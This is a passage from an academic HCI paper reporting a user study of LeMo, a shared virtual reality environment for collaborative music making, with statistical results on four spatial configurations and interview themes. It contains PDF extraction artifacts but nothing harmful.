1.000 10 0.2146 19 0.04298 10 0.2146 CQ7 (coordination)—Which session did you find most difficult to cooperate with collaborator most difficult 7 0.03317 12 0.4469 22 0.004691 11 0.3232 least difficult 21 0.01054 14 0.4262 7 0.03317 10 0.2146 CQ8 (contribution)—Which session do you you feel you made the most contribution to the joint piece most contribution 14 0.4262 12 0.4469 13 1.000 13 1.000 least contribution 11 0.3232 13 1.000 13 1.000 15 0.3084 CQ9 (contribution)—Which session do you you feel your collaborator made the most contribution to the joint piece most contribution 11 0.3232 11 0.3232 16 0.2089 14 0.4262 least contribution 15 0.3084 12 0.4469 18 0.07806 7 0.03317 Notes. aLower-tailed test when k < 13, two-tailed test when k =13, upper-tailed test when k > 13. increased experience. Regarding familiarity with computers, 31 (59.62%) participants rated themselves as computer ‘‘experts’’, 20 (38.46%) chose ‘‘intermidiate’’, and only 1 participant (0.02%) chose ‘‘beginner’’. Twenty participants (38.46%) had tried VR 2–5 times before, 20 (38.46%) had only tried once, the remaining 12 (23.08%) had no VR experience before. Thirty-seven participants knew their collaborators very well prior to the experiment, 3 met their collaborators several times, but did not know well, the remaining 12 did not know their collaborators at all prior to the experiment. The experimental hardware setup was exactly the same with LeMo standard setup, see more details in the previous section ‘‘LeMo—An SVE for collaborative music making’’. After reading information forms and signing consent forms, each pair of participants first received an explanation of the music interface of LeMo (see Fig. 3). Then one Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 13/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 experimenter demonstrated all of the interaction gestures supported in LeMo. By linking the demonstration with the first-person view shown on monitors, participants had a chance to learn how to play LeMo. Then, participants had a trial (5–15 min) to try all the ways of interaction. The trial ended once they were confident enough of all available gestures. The length of time of the tutorial session was flexible to ensure participants with diverse musical knowledge could grasp LeMo. Participants were then asked to have four sessions of collaboratively composing music that was mutually satisfying and complimented an animation loop, each session lasts 7 min. Based on our pilot study and a previous study (Men & Bryan-Kinns, 2018), we found 7 min was sufficient for the task. To counter-balance the learning effect, all four conditions were experienced in a fully randomised sequence to counterbalance the learning effect. In total four animation loops were introduced to trigger participants’ creativity, each to be played in one experimental session on four virtual screens surrounding the virtual stage. These clips were played in an independently randomised sequence to counterbalance impacts on the study. Each session ended with a Post-Session Questionnaire (PSQ, see Table 1). After all the four sessions finished, the Comparison Questionnaire (CQ, see Table 2) and a short interview were carried out at the end of the experiment. RESULTS Participant reports This section reports on the results of the questionnaires. Ratings of Post-Session Questionnaire were refined to counterbalance the learning effect and then analysed with Wilcoxon Rank Sum Tests (Table 1). Binomial tests were run to see if the number of ratings for each option was significantly different than would be expected by chance, upper-tail, lower-tail or two-tailed tests were used accordingly, results are listed in Table 2. Next, we will present how we counterbalanced the learning effect on PSQ and then results will be reported following the sub-type of measures. Counterbalancing the learning effect As aforementioned, we introduced a fully randomised order of experimental conditions to counterbalance the learning effect. However, it turned out many measurements in the Post-Session Questionnaire were still affected by the sequence to a certain extent, as shown in Fig. 5, in which data from all groups were compiled according to how the group was ordered in the session sequence. Wilcoxon Rank Sum tests were run between each two conditions for every question. A red solid arc indicates a significant difference between two bars (p < 0.05), and a grey dotted arc indicates a trend toward a significant difference (p < 0.1). The arcs show that results of four questions (especially PSQ1, PSQ5, PSQ8, PSQ9, PSQ10, PSQ11) are very sensitive to the sequential position of the session. Specifically, in later sessions, participants responded more positively to the helpfulness of the spatial configuration (PSQ1), higher satisfaction with their output (PSQ5), and both more, and better quality of contributions by themselves and contributors (PSQ8, PSQ9, PSQ10, PSQ11). This is probably due to the learning effect which has a much stronger effect on these measures compared with the differences between experimental conditions. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 14/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 2.5 5.0 7.5 10.0 2.5 5.0 7.5 10.0 ra ti n g s ra ti n g s Session 1 (S1) Session 2 (S2) Session 3 (S3) Session 4 (S4) Wilcoxon Rank Sum Test Results p < 0.05 p < 0.10 PSQ7 PSQ8 PSQ9 PSQ10 PSQ11 (sense of collaborator’s activity) (amount of contribution) (amount of contribution) (quality of contribution) (quality of contribution) N = 52 PSQ1 PSQ6PSQ5PSQ4PSQ3PSQ2 (support for creativity) (support for creativity) (prefernce) (sense of collaborator’s presence) (content assessment) (communication quality) S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 S3 S4S1 S2 Figure 5 Results of Post-Session Questionnaire (N = 52) for all sessions. Arcs show significant (solid line) and marginal-significant (dotted line) differences between conditions, indicating possible ordering effects. Full-size DOI: 10.7717/peerjcs.229/fig-5 Given the limited experience some participants had in VR and collaborative music making, learning effect could have possibly and greatly promoted participants’ skills and knowledge in performing the task, resulting in a better feeling of the spatial configuration of the session, higher quality of output, more contribution with better quality in later sessions. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 15/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-5 http://dx.doi.org/10.7717/peerj-cs.229 This learning effect has been also mentioned by some participants in the interview. More details will be discussed in the later subsection ‘‘Interviews’’. To better counterbalance the learning effect and habituation on PSQ, only data collected via PSQ in later two sessions (session 3 and 4) will be retained at the expense of the halved sample size. Box-plots were then drawn (Fig. 6) and Wilcoxon Rank Sum tests were run (Table 1) to compare the conditions against each other. General feeling (helpfulness of spatial configuration, difficulty of cooperation) When asked the condition’s helpfulness for creativity (PSQ1 in Table 1), on a 10-point Likert Scale, participants gave an average rating of 8.77 in Caug, which is significantly higher than 7.61 given in Cfix (Wilcoxon Rank Sum Test, W =492, p = 0.02372). There are trends towards significances between participants’ rating of Caug and Cmov (W =469, p = 0.06318), and between Cpub and Cfix (W =396.5, p = 0.07706). These differences indicate that Caug is better than Cfix, and possibly also better than Cmov in terms of supporting participants’ creativity. When asked to rate the helpfulness of spatial configurations to support personal idea development (PSQ2), the mean rating of Caug (M =8.35) is higher than that of the other three conditions (Cpub: M =7.82; Cfix: M =7.71; Cmov: M =7.75), though no significant differences were found. CQ7 of Table 2 shows that Cpub was rated by significantly many participants (21 out of 52) to be the least difficult to cooperate with their collaborator (Binomial Test, 0.40 > 0.25, p = 0.01054, 1-sided), whilst significantly few participants rated Cpub as the most difficult one to do so (Binomial Test, 0.13 < 0.25, p = 0.03317, 1-sided). On the opposite, Cfix was rated by significantly many participants as the most difficult (Binomial Test, 0.42 > 0.25, p = 0.004691, 1-sided), and significantly few participants (7 out of 52) rated it as the least difficult (Binomial Test, 0.13 < 0.25, p= 0.03317, 1-sided). Preference When asked the level of enjoyment of the spatial configuration (PSQ3), similar to PSQ2, Caug got a higher rating (M =8.65). However, no significant difference was revealed. In CQ1 of Table 2, when asked which session has the most enjoyable spatial configuration, out of 52 participants, both Caug and Cmov were chosen by 16 participants, more than those choosing Cpub and Cfix (10 participants each), though no significant difference was found. When asked which session had the least enjoyable spatial configuration, a significant number of participants (20 out of 52) opted Cfix (0.38 > 0.25, p = 0.02205, 1-sided), and significantly few (7 out of 52) opted Cmov (0.13 < 0.25, p = 0.03317, 1-sided). Result of CQ6 in Table 2 indicates that significantly many participants (19 out of 52) believed Cfix was? the worst setting for creating a good piece of music collaboratively. To summarise, the spatial configuration of Cfix is more disfavoured and that of Cmov is less disfavoured. Sense of co-presence Results of PSQ4, PSQ7 and CQ4 reveal participants’ sense of collaborators’ presence and activities. Cfix’s ratings in PSQ4 and PSQ7 are significantly lower than Cpub and Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 16/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 2.5 5.0 7.5 10.0 ra ti n g s PSQ1 PSQ6PSQ5PSQ4PSQ3PSQ2 (support for creativity) (support for creativity) (prefernce) (sense of collaborator’s presence) (content assessment) (communication quality) 2.5 5.0 7.5 10.0 ra ti n g s Cpub Caug Cfix Cmov Wilcoxon Rank Sum Test Results PSQ7 PSQ8 PSQ9 PSQ10 PSQ11 (sense of collaborator’s activity) (amount of contribution) (amount of contribution) (quality of contribution) (quality of contribution) N = 26 Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug Cfix CmovCpub Caug p < 0.05 p < 0.10 Figure 6 Results of Post-Session Questionnaire (N = 26), data grouped by experimental conditions. Only data collected in the latter two sessions are included. Solid arcs show significant differences and dot- ted arcs show marginal-significant differences between conditions. Full-size DOI: 10.7717/peerjcs.229/fig-6 Caug (Wilcoxon Rank Sum Test, all p < 0.05), indicating Cfix saw a lower sense of the collaborator’s presence and activities. Similarly, when being asked in which session they had the strongest sense of collaborators (CQ4), significantly many participants (27) chose Cpub (0.52 > 0.25, p = 2.807e−05, 1-sided), 17 chose Caug, significantly few chose Cmov Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 17/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-6 http://dx.doi.org/10.7717/peerj-cs.229 (chosen by 6) and Cfix (chosen by 2; Binomial Test, both p < 0.05; more details in CQ4 of Table 2). When questions changed to ‘‘least sense of collaborator’s presense’’, ratings reversed, significantly many chose Cfix while significantly few chose Cpub and Caug (Binomial Test, all p < 0.05; more details in CQ4 of Table 2). These results indicate that in terms of maintaining the sense of collaborator’s presence, Cpub > Caug > Cmov > Cfix. Regarding the sense of collaborator’s activities (PSQ7), a significantly weaker sense was reported in Cfix compared with Cpub and Caug (Wilcoxon Rank Sum Test, both p < 0.05). Cpub also saw a stronger sense compared with Cfix (Wilcoxon Rank Sum Test, W =414.5, p < 0.0346). No significant difference was found between Cpub and Caug nor between Cfix and Cmov. Similarly, CQ3 of the Comparison Questionnaire reveals that significantly many participants reported tracking collaborators’ activities in Cfix was the most difficult, and significantly many felt least difficult to do so in Cpub (Binomial Test, both p < 0.05). These indicate that Cpub seems to be easier for participants to track collaborators’ activities, and Cfix is more difficult for them to do so. Content assessments Participants reported a mean rating 7.21 of output quality in Cfix (PSQ5 of Table 1), which is significantly lower than 8.64 in Cpub, and 8.32 in Cmov (Wilcoxon Rank Sum Test, both p < 0.05), and quasi-significantly lower than 8.38 in Caug (W =473.5, p = 0.05549). Similarly, significantly many participants reported that they produced the least satisfying piece of music in Cfix (Binomial Test, 0.40 > 0.25, p=0.01054, 1-sided), see CQ2 of Table 2. In other words, Cfix tended to led to a music output with lower quality compared with other sessions. Communication assessments As listed in PSQ6, communication quality of Cfix (M =7.04) is significantly lower than 8.68 of Cpub and 8.50 of Caug (Wilcoxon Rank Sum Test, both p < 0.05), and near-marginal significantly lower than 8.04 of Cmov (Wilcoxon Rank Sum Test: W =274, 0.05073), see PSQ6 in Table 1 and PSQ6 in Fig. 6. When asked to compare these sessions, significantly many participants reported the best communication quality was in Cpub and significantly few believed they had the best communication quality in Cfix (Binomial Test, both p < 0.05, see CQ5 of Table 2). Conversely, significantly few had the worst communication quality in Cpub and significantly many had worst in Cfix (Binomial Test, both p < 0.05, see CQ5 of Table 2). In summary, Cfix saw a relatively lower communication quality. Contribution Participants reported that they did a significantly larger amount of contributions in Cpub compared with Cfix (W =439.5, p = 0.009236) or with Cmov (W =412, p = 0.03928), and had done significantly more contribution in Caug compared with Cfix (W =479.5, p= 0.04281), see PSQ8. No significant difference was found in CQ8, which is also questioning the feeling of own contribution. No significant differences were found in the ratings of the amount of the collaborators’ contribution (PSQ9), except a trend reporting their collaborator had a lower amount of contribution in Cfix than Cpub and Caug (Wilcoxon Rank Sum Test, W =469.5, both p < Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 18/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 0.1). However, CQ9 reveals significantly few participants felt that their collaborator did the most contribution in Cmov (Binomial Test, 0.13 < 0.25, p = 0.03317, 1-sided). These results indicate that the addition of personal space in Cfix and Cmov possibly led to a weaker sense of collaborator’s activities. Activity assessments This section reports on measures focusing on the participants’ interactive activities. All measures are listed in Table 3, Wilcoxon Rank Sum tests were run to compare conditions against each other. Contribution (1) Note edits (including note additions and deletions). On average, participants did 98.35 note edits in Cfix, which is significantly more than 77.13 of Cpub, 80.27 of Caug, and 77.69 of Cmov (Wilcoxon Rank Sum Test, all p < 0.05). Note additions, as the main part of note edits, follow a similar pattern. The number of note additions in Cfix is significantly greater than that of Cpub (W =1026, p = 0.03429), and near-marginal significantly greater than that of Caug and Cmov (Wilcoxon Rank Sum Test, both p < 0.07, check detailed statistics in AA2, Table 3). No significant difference was found in note deletions between conditions, this is probably due to the much smaller amount of deletions compared with the number of note edits and additions. These results indicate that participants had more musical edits, specifically note additions in Cfix than the other conditions. (2) Mutual note modifications. Cpub saw the highest average number of mutual note modifications (M =4.37, SD=4.42), this is significantly more than Cfix (M =3.71, SD= 7.69; Wilcoxon Rank Sum Test, W =1703.5, p = 0.01929) and Cmov (M =2.44, SD 3.92; Wilcoxon Rank Sum Test, W =1754.5, p = 0.007331). Caug has the second highest mean (M =4.23, SD=5.57), which is significantly more than Cmov (W =1687.5, p=0.02514), and near-marginal significantly more than that of Cfix (W =1068.5, p = 0.06614). No significant difference between Cpub and Caug or between Cfix and Cmov was found. These results indicate participants had more mutual modifications in Cpub and Caug than Cfix and Cmov, which might indicate a closer collaboration. (3) Number of note edits that fell into public/personal space. Note this measure is only applicable to rigid personal space, which were only available in Cfix and Cmov. Participants did 54.48 (SD = 48.69) note edits in public space, 43.87 (SD = 40.10) note edits inside personal space in Cfix, these numbers reduced to 43.69 (SD = 34.69) in public space and 34 (SD = 25.37) inside personal space when it comes to Cmov. Although both numbers decreased, no significant differences were found between conditions. Location and territory To illustrate how participants used the space, based on the system-logged data, we plotted the positions and directions of participants’ heads and musical note edits on a top view of the stage, see Fig. 7 as an illustrative example of visual traces from arbitrarily selected group 3. Visual traces of all groups are shown in Fig. 8. These figures were made based on system logged data, specifically, the arrows were participants’ locations at 20-second intervals for ease of reading the diagram, and dots are the locations of participants’ hands Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 19/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Table 3 Statistics and Wilcoxon Rank Sum Test (two-tailed) of Activity Assessments (AA). Measure Cpub Caug Cfix Cmov Cpub vs Caug Cpub vs Cfix Cpub vs Cmov Caug vs Cfix Caug vs Cmov Cfix vs Cmov M (SD) M (SD) M (SD) M (SD) p (W) p (W) p (W) p (W) p (W) p (W) AA1—No. of note edits 77.13 (36.59) 80.27 (36.92) 98.35 (48.67) 77.69 (34.61) 0.6988 (1292) 0.02386 (1004) 0.7599 (1304.5) 0.03375 (1025) 0.8965 (1372.5) 0.02228 (1704) AA2—No. of note additions 50.23 (27.12) 58.96 (30.03) 72.88 (40.93) 55.98 (25.31) 0.8301 (1318.5) 0.03429 (1026) 0.8149 (1315.5) 0.06572 (1068.5) 0.876 (1376.5) 0.05591 (1646.5) AA3—No. of note deletions 20.90 (14.46) 21.31 (12.94) 25.46 (18.39) 21.71 (15.15) 0.7108 (1294.5) 0.243 (1172) 0.8376 (1320) 0.3308 (1202) 0.9689 (1358.5) 0.3323 (1501.5) AA4—No. of mutual note modifications a 4.37 (4.42) 4.23 (5.57) 3.71 (7.69) 2.44 (3.92) 0.6452 (1422.5) 0.01929 (1703.5) 0.007331 (1754.5) 0.06614 (1627.5) 0.02514 (1687.5) 0.7732 (1394.5) AA5—Size of group territory (unit: m2) 0.3465 (0.2443) 0.4331 (0.2446) 0.2339 (0.1878) 0.3103 (0.1942) 0.152 (259) 0.1013 (428) 0.7099 (359) 0.005236 (491) 0.09421 (430) 0.2639 (276.5) AA6—Size of personal territory (unit: m2) 0.4282 (0.1690) 0.4547 (0.2193) 0.7475 (0.1801) 0.5067 (0.1894) 0.9559 (1343) 2.25e−12 (272) 0.02347 (1003) 2.085e−10 (374) 0.04421 (1042) 2.3e−08 (2212) AA7—No. of group edits (note edits done in group territory) 36.44 (35.24) 43.04 (34.79) 17.50 (23.79) 25.23 (29.00) 0.2913 (1189.5) 0.001448 (1837) 0.07839 (1621.5) 4.043e−05 (1977) 0.009044 (1751.5) 0.1822 (1151) AA8—No. of personal edits (note edits done in own personal territory) 40.50 (44.81) 37.10 (38.42) 80.62 (51.89) 52.42 (38.81) 0.9610 (1360) 1.179e−05 (678) 0.0294 (1017) 2.157e−06 (623) 0.02016 (994.5) 0.003695 (1799) AA9—No. of note edits done in other’s personal territory 0.058 (0.42) 0 (0) 0.19 (0.89) 0.019 (0.14) 0.3267 (1378) 0.1797 (1275) 1.000 (1352.5) 0.04343 (1248) 0.3267 (1326) 0.1686 (1431) AA10—Average distance between collaborators (unit: metre) 1.11 (0.38) 1.12 (0.38) 2.19 (0.58) 1.28 (0.41) 0.8632 (348) 4.731e−11 (26) 0.2119 (269) 2.663e−10 (34) 0.08045 (242) 2.459e−08 (616) AA11—No. of uses of personal spaces - (-) - (-) 2.40 (1.95) 2.85 (2.14) - (-) - (-) - (-) - (-) - (-) 0.2912 (1193) (continued on next page) M en etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.229 20/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Table 3 (continued) Measure Cpub Caug Cfix Cmov Cpub vs Caug Cpub vs Cfix Cpub vs Cmov Caug vs Cfix Caug vs Cmov Cfix vs Cmov M (SD) M (SD) M (SD) M (SD) p (W) p (W) p (W) p (W) p (W) p (W) AA12—Length of time of using personal spaces (unit: second) - (-) - (-) 128.60 (86.95) 112.19 (78.67) - (-) - (-) - (-) - (-) - (-) 0.4685 (1464) AA13—Average duration of each entry of personal space (unit: second) b - (-) - (-) 73.07 (56.55) 49.54 (44.83) - (-) - (-) - (-) - (-) - (-) 0.008019 (1512) AA14—No. of note edits in public space - (-) - (-) 54.48 (48.69) 43.69 (34.96) - (-) - (-) - (-) - (-) - (-) 0.5051 (1455) AA15—No. of note edits in personal space - (-) - (-) 43.87 (40.10) 34 (25.37) - (-) - (-) - (-) - (-) - (-) 0.3869 (1485.5) AA16—Time spent paying close attention to collaborator (unit: second) c 7.19 (7.44) 14.04 (15.19) 5.51 (9.60) 9.43 (13.96) 0.01032 (957) 0.364 (1492) 0.4725 (1241) 0.001757 (1833.5) 0.05722 (1645) 0.1088 (1105) AA17—Times of paying close attention to collaborator c 9.31 (8.33) 14.79 (11.16) 7.31 (7.48) 11.02 (11.62) 0.005451 (924.5) 0.1591 (1568.5) 0.446 (1234.5) 0.0001145 (1945) 0.03122 (1683.5) 0.02838 (1015) AA18—Time spent paying ordinary attention to collaborator (unit: second) c 79.38 (58.65) 76.32 (51.55) 52.89 (39.91) 74.68 (60.69) 0.9818 (1356) 0.03719 (1673) 0.6655 (1419) 0.02047 (1709) 0.5695 (1440) 0.07865 (1081) AA19—Times of paying ordinary attention to collaborator c 45.02 (19.23) 46.77 (19.42) 32.87 (13.55) 44.98 (20.67) 0.7973 (1312) 0.0006613 (1876) 0.8888 (1374) 0.0001704 (1930.5) 0.6773 (1416.5) 0.002744 (891) AA20—No. of music interface additions x (x) x (x) x (x) x (x) x (x) x (x) x (x) x (x) x (x) x (x) AA21—No. of music interface additions in public space - (-) - (-) x (x) x (x) - (-) - (-) - (-) - (-) - (-) x (x) AA22—No. of music interface additions in personal space - (-) - (-) x (x) x (x) - (-) - (-) - (-) - (-) - (-) x (x) Notes. aMutual note modifications include activation/deactivation, the last update of which was performed by the collaborator. bData of four participants (3B, 4A, 17B 18A) were excluded when calculating this metric as these participants did not use personal space, which made this metric not apply to them. cThe difference between the close attention and the ordinary attention is the breadth and depth of FOV, FOV of close attention roughly covers 27 degrees (horizontally), 28 degrees (vertically) and 1 m (depth), whilst FOV of ordinary attention roughly covers 27 degrees (horizontally), 28 degrees (vertically) and 2.7 m (depth). M en etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.229 21/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 Figure 7 Illustrative example of visual traces of the participants’ locations, directions and musical note edits (group 3). Arrows show participant’s position and direction at 20 s intervals, dots show partici- pant’s hand’s position while performing note edits. Full-size DOI: 10.7717/peerjcs.229/fig-7 when making musical note edits. Research of table-top collaboration defines personal territory as a workspace close to the person and group territory as the central area or spaces between collaborators (Xambó et al., 2013; Scott, Carpendale & Inkpen, 2004; Scott & Carpendale, 2010). Following this definition, we dye the area within a 0.6-metre radius of the participants’ locations (locations here are at 1-second interval for higher accuracy) with different tint colours (red for participant A’s personal territory, and blue for B’s) to indicate territories. We chose 0.6 metres as it falls into the range of close phase of personal distance, and permits participants to touch each other or the same music interface (Hall, 1966), most of the musical note edits also fell inside this range. (1) Distribution of locations and interactions. The more intensely blue or red the area is, the more presence the corresponding participant had shown in that location. The overlap is coloured grey, indicating the appearance of both participants, which can be seen as group territory. (2) Sizes of group territory and group edits (edits undertaken in group territory). By calculating the size of red/blue/grey area, the size of personal/group territory can be calculated. Specifically, participants formed an average of 0.3465 m2 of group territory in Cpub, 0.4331 m2 in Caug, 0.2339 m2 in Cfix and 0.3103 m2 in Cmov (AA5 of Table 3). Results of the Wilcoxon Rank Sum Tests show that the size of group territory of Caug is significantly larger than that of Cfix (W =491, p = 0.005236), and near-marginal significantly larger than Cmov (W =430, p=0.09421). No significant difference was found between Cpub and Caug. AA7 of Table 3 shows that participants had an average of 36.44 group edits in Cpub, which is significantly more than 17.50 of Cfix (Wilcoxon Rank Sum Test, W =1837, p = 0.001448), and a near-marginal significantly more than 25.23 of Cmov (W =1621.5, p = 0.07839). Caug resulted in a higher average of group edits (M =43.04), though not significantly higher than Cpub, it is significantly higher than numbers of Cfix and Cmov (Wilcoxon Rank Sum Test, both p < 0.01). These indicate the spatial configurations of Cpub and Caug are more friendly to group edits. (3) Sizes of personal territory (AA6 of Table 3) and personal edits (edits fallen into personal territory; AA8). Participants formed a significantly larger personal territory in Cfix Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 22/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-7 http://dx.doi.org/10.7717/peerj-cs.229 Figure 8 Visual traces—the participants’ locations, directions and musical note edits shown on a top view of the stage (based on system-logged data of all groups). Full-size DOI: 10.7717/peerjcs.229/fig-8 Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 23/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-8 http://dx.doi.org/10.7717/peerj-cs.229 (M =0.7475 m2, SD = 0.1801) compared with all the other three conditions (Wilcoxon Rank Sum Test, all p < 0.001), and had significantly more personal edits in Cfix compared with other conditions (Wilcoxon Rank Sum Test, all p < 0.01; AA8). Similarly, a larger size of personal territory was formed in Cmov and more personal edits were done in Cmov compared with Cpub and Caug (all p < 0.05). No significant differences were found between Cpub and Caug, neither in the size of personal territory nor in the number personal edits. To summarise, Cfix results in the largest size of personal territory and the largest number of personal edits, the metrics of Cmov follows, and Cpub and Caug have the least, indicating that Cfix led to a much looser collaboration, in which participants worked more independently, whilst Cpub and Caug, on the opposite, led to more interactivities in the group territory. (4) Average distance (AA10 of Table 3). Participants had an average distance of 2.19 metres between themselves and their collaborators in Cfix, this is significantly bigger than other three conditions (Wilcoxon Rank Sum Test, all p < 0.001). Namely, in the other three sessions participants worked more closely. Times and amount of use of personal space As shown in AA11, AA12 and AA13 of Table 3, in Cfix, participants had an average of 2.40 entries of personal space on average, with each entry lasting 73.07 s with total duration 128.60 s. For Cmov, the participants did 2.85 entries, each lasting 49.54 s on average, with a total usage time of 112.19 s, no significant difference was found in the number of entries or in the sum usage time. However, the average duration of each entry of Cmov is significantly shorter than that of Cfix (Wilcoxon Rank Sum Test, W =1512, p = 0.008019), indicating that the personal spaces of Cfix were possibly more used for longer, independent creation. Attention (1) The time participants spent paying close attention to each other - Throughout the 420-second session, participants had their close attention toward their collaborators’ heads for 14.04 s in Caug, which is significantly longer than 7.19 s in Cpub, and 7.31 s in Cfix (Wilcoxon Rank Sum Test, both p < 0.05), and near-marginal significantly longer than 11.02 s in Cmov (W =1645, p = 0.05722, see AA16 in Table 3). (2) Participants oriented their close attention toward their collaborator for significantly different times, they did most of the time in Caug (M =14.04), this is significantly more than 7.19 in Cpub, 7.31 in Cfix and 11.02 in Cmov (Wilcoxon Rank Sum Test, Cpub vs Caug: W =924.5, p=0.005451; Caug vs fix: W =1945, p=0.0001145; Caug vs Cmov: W =1683.5, p = 0.03122). Wilcoxon Rank Sum Test result also shows participants paid their attention to their partner significantly fewer times in Cfix than they did in Cmov (W =1015, p = 0.02838), see AA17 in Table 3. These results indicate the spatial configuration in Caug significantly promoted participants to pay more close attention to their collaborator, whilst Cmov possibly promoted insignificantly and Cfix demoted insignificantly compared with Cpub. (3) The time participants spent paying ordinary attention to each other. Different from the impact of spatial configurations on close attention, neither Caug nor Cmov significantly changed the way participants paying their ordinary attention, all fell inside the range from 70 to 80 s out of the 420-second session. Cfix greatly reduced participant’s ordinary Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 24/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 attention paid to each other, on average participants only spent 52.89 s on doing this, which is significantly shorter than Cpub and Caug (Wilcoxon Rank Sum Test, both p < 0.05) and near-marginal significantly shorter than Cmov (Wilcoxon Rank Sum Test, W =1081, p = 0.07865), more details are shown in AA18 of Table 3. (4) Similar to the time paying ordinary attention to each other, participants only drew an average of 32.87 times of ordinary attention to each other in Cfix, which is significantly lower than all the other three conditions (Wilcoxon Rank Sum Test, all p < 0.001), check detailed statistics in AA19 of Table 3), indicating the spatial configuration of Cfix greatly reduced participants’ paying ordinary attention to each other. Interviews Post-task interviews with participants revealed more reflective insights into the spatial configurations. Around 41,000 words of transcription were transcribed and a thematic analysis of the transcription was undertaken. For more information about the thematic analysis, see (Braun & Clarke, 2006; Yin, 2017). The starting point of the thematic analysis was a reading through of the transcripts, then we did an inductive analysis of the data, collapsing relevant patterns into codes. Next, these codes were combined into overarching themes, which were then reviewed and adjusted until they fit codes well. As shown in Fig. 9, in total, 650 coded segments, 24 codes and 3 overarching themes emerged from the thematic analysis: Learning effects Members of 18 groups mentioned the effect of the session sequence. Specifically, 40 coded segments contributed by 24 participants were related to learning effects. Participants reported the sequence is an ‘‘important factor’’ (Participant 15A, hereafter abbreviated to P15A). The first session was felt to be hard as they were ‘‘just being introduced to [the system and they were] still adjusting’’ to it (P5A), trying to ‘‘[figure] out how the system was working’’ (P16A). When they ‘‘were progressing into latter sessions, [they] felt easier to communicate and use gestures to manipulate the sound, being able to collaborate more, more used to the system’’ (P5B), these changes led to a higher level of satisfaction and more enjoyment in later conditions. It should also be noted that interestingly P11A and P11B reported the sequence effect adversely, they enjoyed the first session more because ‘‘the first one was an element of surprise, a total surprise’’ as that was ‘‘the first time they were using the system’’. That feeling of freshness made that session more exploratory and more joyful to them. These learning effects might possibly affect the results of Post-Session Questionnaire and Comparison Questionnaire and thus should be well counter-balanced. Reporting the spatial configurations (1) Cpub - Simple but can be chaotic. Since there is no personal space, participants could, and had to hear all the interfaces all the time. In total, 16 coded-segments are about the disadvantage of this setting, some examples are: ‘‘a bit troubling’’ (P11B), ‘‘music [was] always very loud’’ (P9A), ‘‘it was global music, and there was someone annoying’’ (P2A), ‘‘[they were] not going to say anything’’ about disagreement because that could possibly make them appear to be ‘‘rude’’ (P2A). It was easier if there is something helpful ‘‘to perceive Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 25/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 0 30 60 90 N o of c od ed s eg m en ts Le ar ni ng ef fe ct 40 12 34 10 19 8 6 4 3 9 0 16 3 25 111 22 46 16 19 56 26 31 59 52 23 Cp ub Ca ug Cf ix Cm ov Cp ub Ca ug Cf ix Cm ov Cp ub Ca ug Cf ix Cm ov Cp ub Ca ug Cf ix Cm ov Cp ub Ca ug Cf ix Cm ov Ad va nt ag es of sy st em Di sa dv an ta ge s of sy st em Su gg es tio ns Ot he r Most favourite Second favourite Most unfavourite condition Advantages of the condition Disadvantages of the condition Reporting the Spatial Configurations Reporting LeMo System Reporting Learning Effect Figure 9 Ingredients of all the coded-segments of the interview, numbers of coded segments are shown along the bars. . Full-size DOI: 10.7717/peerjcs.229/fig-9 what [they were] doing, and not get confused with what [their collaborator] was doing’’ (P15B), it was too ‘‘chaotic’’ (P20A), ‘‘too confusing’’ (P22A) & P22B), ‘‘annoying’’ (P25B). They ‘‘cannot concentrate’’ (P25B), ‘‘everything [was] open and quite noisy’’ (P26B), they didn’t ‘‘have the tranquillity to operating [the] sounds...everything [came] mixed, which [was] difficult to manage’’ (P22A). There were 25 coded segments from 14 participants reporting the positive side of the Cpub, some examples are: (i) pieces created in ‘‘personal space’’ might clash in a music way (P1A), ‘‘better to work when knowing how it sounds all together’’ (P17B), music pieces might match better; (ii) better for providing help to the other, according to P4A, they needed someone to lead them and thus the ability to hear all the work all the time was helpful; (iii) ‘‘space wise’’, namely, no space limitation, compared with having to work closer to ‘‘hear the sound well’’ (P12A), Cpub does not have this constraint, they could choose to work ‘‘anywhere’’ (P24A); (iv) ‘‘easier’’ to understand the condition (P6B), fewer confusions when simply being able to hear all the things all the time (P13A); (v) ‘‘collaborative wise’’ (P13A), less separation, better collaboration compared conditions where ‘‘personal space’’ was provided (P3B, P18A and P18B). Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 26/39 https://peerj.com https://doi.org/10.7717/peerjcs.229/fig-9 http://dx.doi.org/10.7717/peerj-cs.229 (2) Cpub - Simple but can be 